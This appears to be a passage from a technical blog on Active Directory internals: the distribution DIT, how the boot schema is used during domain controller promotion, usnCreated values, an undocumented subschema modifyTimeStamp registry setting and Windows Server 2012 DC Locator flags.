|------|----------|-----|----|
| ADDS | %windir%\system32\ntds.dit | N/A | Windows 2000 Server, Windows Server 2003 |
| ADDS | %windir%\system32\ntds.dit | Yes | Windows Server 2008, Windows Server 2008 R2, Windows Server 2012, Windows Server 2012 R2 |
| ADAM/ADLDS | %windir%\ADAM\adamntds.dit | N/A | Windows XP (separate download), Windows Server 2003 (separate download, or R2) |
| ADAM/ADLDS | %windir%\ADAM\adamntds.dit | Yes | Windows Vista (separate download), Windows 7 (separate download), Windows 8, Windows Server 2008, Windows Server 2008 R2, Windows Server 2012, Windows Server 2012 R2 |
Note: SxS means that the files are packaged in the SxS folder on the disk and aren’t copied into the location until the actual role is installed.
So what is the Distribution DIT and when is it used?
It’s actually the DIT all DCs start out with, except in one case.
The distribution DIT is copied to the database location (DatabasePath) specified in DCPROMO during promotion. We can verify this by checking the JET database signature of the two databases once DCPROMO has completed; in my case I compare the distribution DIT for ADLDS against my installed ADLDS instance ‘ESEDEV’:
Distribution DIT:
Installed/Promoted DIT:
As you can see – They do match.
So what does the Distribution DIT contain?
The distribution DIT contains the base schema for either ADDS or ADLDS (which has a more lightweight schema than ADDS) – so here my tool ESEDump comes into play; let’s dump a distribution DIT for ADLDS:
Dumping table datatable:
We can see that the first rows inside the distribution DIT contain O=Boot, CN=Schema,O=Boot and CN=BootMachine,O=Boot, and then simply the schema follows. We can see that all of the schema objects have a PDNT that equals 5, the DNT of the CN=Schema,O=Boot naming context (NC) – or wait, are they really NCs? Let’s add in ‘instanceType’:
Yes, they are NCs – instanceType decoded as follows:
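The decoding can be done with a small helper; the bit values below are the documented instanceType flags (the helper itself is just a sketch):

```python
# Documented bit flags of the Active Directory instanceType attribute.
INSTANCE_TYPE_FLAGS = {
    0x1:  "head of a naming context (NC head)",
    0x2:  "replica is not instantiated",
    0x4:  "object is writable on this directory",
    0x8:  "the naming context above this one is held",
    0x10: "NC being constructed for the first time via replication",
    0x20: "NC being removed from the local DSA",
}

def decode_instance_type(value):
    """Return the list of flag descriptions set in an instanceType value."""
    return [name for bit, name in INSTANCE_TYPE_FLAGS.items() if value & bit]
```

For example, the typical value 5 (0x1 | 0x4) decodes as a writable NC head.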
So what is CN=BootMachine? This is a fake DSA, so that the code can use common routines during install. (I can’t explain it better without starting an entire new article – might happen someday.)
So what happens during install?
So it’s time to determine how the schema in the distribution DIT is used during install (or promotion of a new domain controller) – well it depends – if it’s used at all.
These are the different cases.
Promoting the first domain controller in a forest:
The distribution DIT is copied into the database location (DatabasePath) specified in DCPROMO.
A domain naming context is created in the DIT (except for ADAM/ADLDS)
A configuration naming context is created in the DIT.
A schema naming context is created in the DIT.
The boot schema is moved from CN=Schema,O=Boot to the newly created schema naming context.
During this move, the following happens for all objects that have a PDNT of 4, i.e. the children of CN=Schema,O=Boot:
Objects are moved to CN=Schema,CN=Configuration,X=foo
As the objects are moved, their ancestors_col in the DIT must be updated to reflect the new parent chain under CN=Schema,CN=Configuration,X=foo
As the objects are moved from one naming context (NC) (CN=Schema,O=Boot) to another (CN=Schema,CN=Configuration,X=foo), their NCDNT_col in the DIT needs to be updated as well.
Objects have their metadata updated; the fields updated are:
OriginatingDsa
timeChanged
The object is given a new GUID.
A default security descriptor is set, depending on ADDS or ADLDS and on whether the object is an attribute or a class.
The prefixMap is read from CN=Schema,O=Boot and saved into the prefixMap of CN=Schema,CN=Configuration,X=foo. More information on the prefixMap/prefixTable can be found here: http://msdn.microsoft.com/en-us/library/cc228445.aspx
Note: This allows the distribution DIT to contain schema entries that the DSA doesn’t have knowledge about (i.e. attributes and classes beyond the base schema can come pre-loaded) – this used to be the case for Small Business Server, which pre-loaded the Exchange schema.
Removing CN=BootMachine,O=Boot
Removing CN=Schema,O=Boot
Removing O=Boot
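The move steps above can be sketched as a toy simulation. Rows are modelled as plain dicts with only the bookkeeping columns discussed in the text; the DNT values, the ancestors chain and the DSA name are hypothetical placeholders, not real DIT values:

```python
import uuid

BOOT_SCHEMA_DNT = 4   # DNT of CN=Schema,O=Boot (per the text above)
NEW_SCHEMA_DNT = 100  # hypothetical DNT of CN=Schema,CN=Configuration,X=foo

def move_boot_schema(rows, new_dsa="new-dsa", now=0):
    """Toy simulation of the install-time move of the boot schema:
    reparent each child of CN=Schema,O=Boot, fix its ancestry and NC
    bookkeeping, refresh its metadata and give it a new GUID."""
    for row in rows:
        if row["PDNT"] == BOOT_SCHEMA_DNT:
            row["PDNT"] = NEW_SCHEMA_DNT            # new parent
            # Rebuilt ancestry chain (illustrative DNTs for root/config NC):
            row["ancestors"] = [1, 2, NEW_SCHEMA_DNT, row["DNT"]]
            row["NCDNT"] = NEW_SCHEMA_DNT           # new naming context
            row["originating_dsa"] = new_dsa        # metadata: OriginatingDsa
            row["time_changed"] = now               # metadata: timeChanged
            row["guid"] = uuid.uuid4()              # brand-new GUID
    return rows
```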
Promoting a replica in an already existing forest:
Remove the following, as a schema already exists in the enterprise and will be replicated in:
Removing all objects with a PDNT of 4, i.e. all objects that have CN=Schema,O=Boot as their parent.
Removing CN=BootMachine,O=Boot
Removing CN=Schema,O=Boot
Removing O=Boot
Both in case A (first DC in the forest) and case B (replica in an existing forest), the install code will trigger the garbage collector so it can immediately delete all traces of the O=Boot naming context (NC) and its descendant objects.
This article started out with a question: how can the Schema naming context (NC) have a higher USN than many of the attributes in the schema – doesn’t the schema container have to be created first, before its child objects? Well, we know the answer to that question already, but let’s confirm it.
Let’s get the “usnCreated” on the Schema naming context (NC):
Ok, it’s 4100.
Let’s try an attribute, “Account-Expires”:
OK, that’s a pretty low “usnCreated” and much lower than the Schema naming context (NC) above.
So let’s look up the “Account-Expires” in the distribution DIT:
Yes, “usnCreated” is 6 in the distribution DIT as well. In other words, “usnCreated” will come from the distribution DIT for base schema objects, hence they have a lower usnCreated than the schema naming context (NC) itself.
I just played around with a Windows Server 2012 R2 DC and noticed an undocumented registry value (it might already have been added in Windows Server 2012) that is not present in Windows Server 2008 R2 or earlier releases. The value is:
A ‘Subschema modifyTimeStamp behavior’ DWORD registry value can be configured within the following key: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\services\<INSTANCE>\Parameters. Note: if the value doesn’t exist or has a value of 0, the default behavior applies.
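Setting the value could look like this as a .reg fragment. For ADDS the instance key is NTDS; for ADLDS substitute your instance name for <INSTANCE> (and as always with undocumented settings, test before touching production):

```
Windows Registry Editor Version 5.00

; <INSTANCE> is NTDS for ADDS, or the ADLDS instance name
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\services\NTDS\Parameters]
"Subschema modifyTimeStamp behavior"=dword:00000001
```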
But what happens, and what works different if a value of ‘1’ is used?
It seems like we’re getting the time when the schema actually was updated, and not just when the schema cache was updated, which is what the ‘modifyTimeStamp’ attribute indicates by default if you request it over the subschema. I compared the time of ‘modifyTimeStamp’ with the metadata for the ‘schemaInfo’ attribute to verify this (more on that attribute another day, if someone wants?).
So what can this be used for? I have no idea :) One can just read off the schemaInfo instead.
Windows Server 2008 SP2: Lsass.exe process crashes and error code 255 is logged because of a CNF NTDS Settings object in Active Directory on Windows http://support.microsoft.com/kb/2913087/en-US
The DC Locator flags to specify the requirements of a Windows Server 2012 DC or a Windows Server 2012 R2 DC using the DsGetDcName API are as follows:
Table 1: Windows Server 2012 DC Locator flags

| Name | Description |
|------|-------------|
| DS_DIRECTORY_SERVICE_8_REQUIRED (0x200000) | Requires that the returned domain controller be running Windows Server 2012 or later. |
| DS_DIRECTORY_SERVICE_9_REQUIRED (0x400000) | Requires that the returned domain controller be running Windows Server 2012 R2 or later. |
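Since these are just bits OR’ed into the Flags parameter of DsGetDcName, combining them is straightforward. A small sketch (the two table values are from above; DS_FORCE_REDISCOVERY is the standard 0x1 flag to bypass the locator cache; the helper function is my own, not a Win32 API):

```python
# DC Locator flag bits for the DsGetDcName Flags parameter.
DS_FORCE_REDISCOVERY            = 0x00000001
DS_DIRECTORY_SERVICE_8_REQUIRED = 0x00200000
DS_DIRECTORY_SERVICE_9_REQUIRED = 0x00400000

def locator_flags(require_2012_r2=False, force_rediscovery=False):
    """Build a Flags value requiring at least a Windows Server 2012 DC,
    optionally 2012 R2, optionally bypassing the locator cache."""
    flags = DS_DIRECTORY_SERVICE_8_REQUIRED
    if require_2012_r2:
        flags |= DS_DIRECTORY_SERVICE_9_REQUIRED
    if force_rediscovery:
        flags |= DS_FORCE_REDISCOVERY
    return flags
```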
The exception is the DMD, or the SubSchemaSubEntry, “CN=Aggregate,CN=Schema,CN=Configuration,DC=X”
Let’s have a look with LDP.exe:
So this clearly shows that ‘modifyTimeStamp’ is NOT based on the ‘whenChanged’ attribute for the subSchemaEntry.
How it really works
Let’s agree we have confirmed that. So, to the next question: what is it based on? Well, it’s based on the last time the in-memory schema cache of the particular DC was updated, either during boot or by manually triggering the operational attribute “schemaUpdateNow: 1”.
So let’s try that?
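Triggering the schema cache refresh can be done with the well-known rootDSE modify, for example as an LDIF file (imported with ldifde -i, or performed equivalently from LDP.exe via a Modify against an empty DN):

```
dn:
changetype: modify
add: schemaUpdateNow
schemaUpdateNow: 1
-
```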
So let’s have a look again:
Yes – “modifyTimeStamp” now shows today’s date, 2013-06-28, instead of the previous 2013-06-21 :)
Why it was implemented
So I guess now there is really one good question left, why?
The answer can be found if you read up on RFC 2251, which says:
“modifyTimestamp: the time this entry was last modified” – you can read further on MSDN, where you can see what functionality defined in RFC 2251 Active Directory has implemented: http://msdn.microsoft.com/en-us/library/cc223231.aspx
It’s late and I’ve just gone through the “Windows Server 2012 R2 Preview” schema, aka “Schema 69”, and it seems like it first introduces an attribute to the schema that it later in the process makes defunct.